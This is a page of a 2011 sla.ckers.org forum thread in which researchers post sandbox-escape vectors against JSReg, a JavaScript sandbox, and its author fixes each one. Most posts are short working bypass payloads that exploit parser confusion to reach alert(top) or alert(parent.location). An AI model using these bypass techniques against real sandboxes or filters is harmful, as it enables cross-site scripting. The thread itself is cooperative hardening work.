Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213Next
Current Page: 8 of 13
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 02, 2011 06:13AM

@Jonas

Thanks! These are awesome bugs and fixed :D

I'll disallowed namespaces because JSReg thinks it's a ternary and so allows the property as an array not accessor.

This bug:(function(){this['alert'](this['top'])})()

Was related to your newer post because I wasn't tracking those statements as left == true. The fix was simply to check each of these and simply add left = 1.

As for the typo please suggest an alternative, this work is "owned" :) and built by slackers I'm happy to make it more readable. My logic was it tracks in & instanceof but the result was a pretty bad variable name =)

Once again thanks Jonas, Lever_One and everyone else for breaking JSReg you are making it much stronger!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 02, 2011 06:27AM

Regarding the typo, in function rewrite on line 718 it says rewriteinInstanceofOperator instead of rewriteInInstanceofOperator (capital I) which results in error when you for example do:

'x' in {x:1}

I'm finding this too much fun... Spending way too many hours on it.. ;)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 02, 2011 07:25AM

@Jonas

Fixed :)
I know exactly what you mean :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 02, 2011 08:23AM

1.17

+{}
{}/lo='/,alert(parent.location)//'

=========

alert(this) // <-- check this on Opera


Quote
Jonas Magazinius
Opera seems to be broken..

Yeah, but should not.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/02/2011 02:17PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 02, 2011 10:24AM

@LeverOne: Opera seems to be broken..

@Gareth: Here's anotherone for you:

0?0:{}/alert(top)/i

Confusing an object with block and division with regexp. (There are more similar to this one, but I'm in a rush..)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 02, 2011 10:50AM

OK, I couldn't help myself.. Here's one last before my teaching starts:

switch(0){case {}/alert(top)/i:1}


Before this I didn't know that the "case-label" actually is an expression.. Quite interesting!

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 03, 2011 06:50AM

Phew fixed all those thanks!

Opera bug wasn't really a opera bug, I had a empty string testing a regex which works on other browsers but not on opera

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 03, 2011 08:13AM

1.18

~
{}/alert(parent.location)/lo

+function(){1}/alert(parent.location)/lo

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 03, 2011 10:49AM

Tricky and fixed.

Do you think I'm getting closer? or is this just a windmill war?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 03, 2011 11:15AM

NOBODY has been able to do it right the first time. Step by step.

1.19

A

lo:{}/'/,alert(parent.location)//'

lo:function x(){1}/'/,alert(parent.location)//'

B
0
{}/lo='/,alert(parent.location)//'

C
i=0,i++
{}/lo='/,alert(parent.location)//'

D
(function lo(){1})(1,/'/);alert(parent.location)//'

{}'lo'.replace(/'/,""),alert(parent.location)//'


1.20

var È=È/alert(parent.location)/È


============

(function test(x,
JSREG_FUNC){ alert(1)})(1,{})

============

Tip:

I am glad that in version 3.10 you refuse to use constructs such as "!= undefined", "== undefined", etc.

However, in code there are a few:

1) funcName !== undefined

2) Static === undefined

This is potentially very dangerous, because JSREG has a "old environment" mode. At the present time, the consequences are not critical - bypass "checkMaxFunctCalls" or code deformation.

In these cases "undefined" must be replaced by "{}.x" or similar.

----------------------
~Veritas~



Edited 7 time(s). Last edit at 05/04/2011 02:57PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 05, 2011 01:38PM

@LeverOne

Big thanks! And fixed those
I've also added a list of tests based on previous vectors (I didn't used to have much data but now I do!!! :) )

I've removed the crappy preText check with regexes and instead use states of each match to decide if it's a block statement etc I expect some bugs here because I changed a lot of code :( but I've tested all the previous vectors and it seems to work ok but then again it could create syntax errors, I'll add some js tests too soon which will help eliminate syntax bugs.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 05, 2011 03:52PM

The key moment, which determines the difference between the block's delim and the object's literal, can be "moved up" as far as possible.

var lo=0?
lo:{}/alert(parent.location)/0


~{
lo1:{lo2:1}/alert(parent.location)/1
}


{lo1:
{lo2:1}/'/,alert(parent.location)//'
}


(
{lo:1}/alert(parent.location)/1
)


[
{lo:1}/alert(parent.location)/1
]



Nevertheless, a little better!

===============================

Quote

(chr === '+' || chr === '-' || chr === '+')

----------------------
~Veritas~



Edited 5 time(s). Last edit at 05/06/2011 06:48AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 06, 2011 06:52AM

Cool fixed those and added the vectors to the hack test

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 08, 2011 12:43PM

Quote

{lo1:
{lo2:1}/'/,alert(parent.location)//'
}
Quote

[
{lo:1}/alert(parent.location)/1
]

1?
{}/alert(parent.location)/i:0

0?0?
lo:lo:{}/alert(parent.location)/1

0
{
/'lo/,alert(parent.location)//'
}


Bugs:

~/lo/

a\u006Cert(1) vs a\u006cert(1)

alert((0||alert)instanceof.2.constructor)


Quote
Gareth Heyes
I need to think about that one
I agree, this remains a rather large hole. I stop checking for a while.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/09/2011 10:55AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 09, 2011 06:50AM

Thanks! Fixed those.

I'm not happy with out I detect block statements though, I need to think about that one I expect it will be pwnd again :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 09, 2011 11:09AM

Pwnd myself sigh

(function(){
if(0)
return
{}/'abc/;var x=alert(location);//'
})()

Update...
and fixed. I'm gonna rewrite some code and make it a little more defensive

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/10/2011 07:15AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 13, 2011 12:46PM

Found two new bypasses based on the in operator:

0 in /'/,alert(top)//

for(0 in /'/,alert(top)/i);

I think the problem might be left=1; but I don't know the source well enough.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 13, 2011 01:29PM

Yeah I made left = 1 for in operators which is wrong =) and I didn't add the laststate check for in operators in the regex check. Fixed and big thanks again!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 15, 2011 03:35PM

There are a number of issues with the parsing and rewriting of for-in loops.

First, the "forin" regex does not properly parse for-in loops:

for(x in [])[] // Incorrect parse
for(x in ([]))[] // Correct parse
for(x in void 0)[] // Incorrect parse
for(x in (void 0))[] // Correct parse
for([] in x)[] // Incorrect parse
for(([]) in x)[] // Incorrect parse
for({} in x)[] // Incorrect parse
for(x in x)[] // Correct parse



Second, the rewriting of for-in loops without a block, breaks the loop structure:

for(x in x)[] // rewrites to:

for($x$ in $x$)
if(!/^[$].+[$]$/.test($x$)){continue;};
$x$=$x$.replace(/^\$|\$$/g,'');
[]


Thirdly, the regex to check that property names begin and end with $ does not take numbers into account:

for(x in ([1,2])){alert(x)} // Should alert 0 and 1 but doesn't

Suggested fix:
if(!/^[$].+[$]$|^\d+$/.test($x$)){continue;};


Lastly, some bypasses based on the first problem:

for(x in void 0)/'/;alert(top)//
for(x in [].x)/'/;alert(top)//
for(x in [][0])/'/;alert(top)//
for([] in ([].x))/'/;alert(top)//
if(0 in[])/'/;alert(top)//
if([]in[])/'/;alert(top)//
while([]in[])/'/;alert(top)//
for(;[]in[];)/'/;alert(top)//



One interesting side-note; if the right-hand side of the for-in is undefined, the left hand side is never evaluated.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 05/15/2011 04:24PM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 15, 2011 04:36PM

BTW, if you want to make it defensive; one thing I look for when testing is situations where [] is incorrectly parsed as index instead of array and rewritten to [JSREG_FUNC.gp()]

This should never happen since the index should always have an expression in it, i.e. [][] gives syntax error.

When I find this I know that / will be incorrectly parsed as division instead of regex.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 16, 2011 09:59AM

Jonas you're awesome! I knew this would be the next thing you'd exploit =) I will rewrite the loops section as it's pretty weak as you've demonstrated. I'll also improve each match to use one check instead of two for performance. Pretty busy atm but expect an update soon probably when the missus is watching something crap on tv :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 17, 2011 12:00PM

Turns out the problem runs a bit deeper than I thought:

while(0)/'/;alert(top)//
if(0)/'/;alert(top)//
for(;0;)/'/;alert(top)//
with(0)/'/;alert(top)//

Not sure if these are a separate issue or not.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 17, 2011 01:53PM

A new kind of problem:

0/function(){}/alert(top)//

Also, this causes endless loop:

0/function(){}/

Found while trying to exploit this:

function()[]

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 17, 2011 02:10PM

1
~/'lo/+alert(parent.location)//'


true
{}/'lo/+alert(parent.location)//'


1?
function lo(){1}/alert(parent.location)/1:1


var i=1
i+++
{lo:1}/alert(parent.location)/1


added later:

[
function(lo){}/alert(parent.location)/1
]


Bugs:

~function(){/re/}

~{x:/re/}

(0||alert)instanceof.2.constructor --> should return "false" (missed Number.prototype.$constructor$ and Math.prototype.$constructor$)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 05/18/2011 08:55AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 17, 2011 02:18PM

Sorry, but here's another one..

(function(){}['constructor'])('alert(top)')()

(function(){}/alert(top)/1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 05/17/2011 02:37PM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 17, 2011 02:28PM

@Jonas Magazinius,

previous one was a great bypass!

--------- Non-IE browsers

1</**/!--i+
{}/'lo/,alert(parent.location)//'


1<//
!--i+
{}/'lo/,alert(parent.location)//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/18/2011 08:49AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: May 17, 2011 03:13PM

@LeverOne: Thanks, I admire your work :)

And two more..

[]instanceof{}/alert(top)//
[]in{}/alert(top)//

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 17, 2011 06:11PM

Non-FF browsers:

var n
/'lo/+alert(parent.location)//'


===================

Additional testcases for statements "break" and "continue":

All browsers:

for (i=0;i<1;i++){
if(0) continue
{}/'lo/+alert(parent.location)//'
}


for (i=0;i<1;i++){
if(0) break
{}/'lo/+alert(parent.location)//'
}


Non-FF browsers:

x:for (i=0;i<1;i++){
if(0) continue x
/'lo/+alert(parent.location)//'
}


x:for (i=0;i<1;i++){
if(0) break x
/'lo/+alert(parent.location)//'
}

=================================

if(0)0
else {}/'lo/,alert(parent.location)//'


try{}
catch(e){}
finally{}/'lo/,alert(parent.location)//'


bug:

if(0)0
else/x/


Another syntactic heterogeneity: ";" followed by a declarations block - isn't nessesary.

for(;
{}/alert(parent.location)/1
;lo)0

==============================

I would also like to warn you, @Gareth, about syntactic bomb based on this:
Quote
Jonas Magazinius
if(0)/'/;alert(top)//

Actually here is bomb:

// FF

try{x}
catch(lo if(1)/alert(parent.location)/1){}

----------------------
~Veritas~



Edited 7 time(s). Last edit at 06/26/2011 01:48PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 18, 2011 06:40AM

@LeverOne @Jonas

I too admire both your work :)

I seem to have a bloody nose again :D great stuff! Thanks, I'll let you know soon when I have a fix. Statements defo needs a rewrite.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 14, 2011 03:01PM

I don't know how to thank you guys as you've helped me so much so I've dedicated a blog post to you both and uploaded a new version of JSReg

[www.thespanner.co.uk]

If I was a millionaire I'd give you cold hard cash :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 07/14/2011 06:32PM by Gareth Heyes.

Options: ReplyQuote
Pages: PreviousFirst...345678910111213Next
Current Page: 8 of 13


Sorry, only registered users may post in this forum.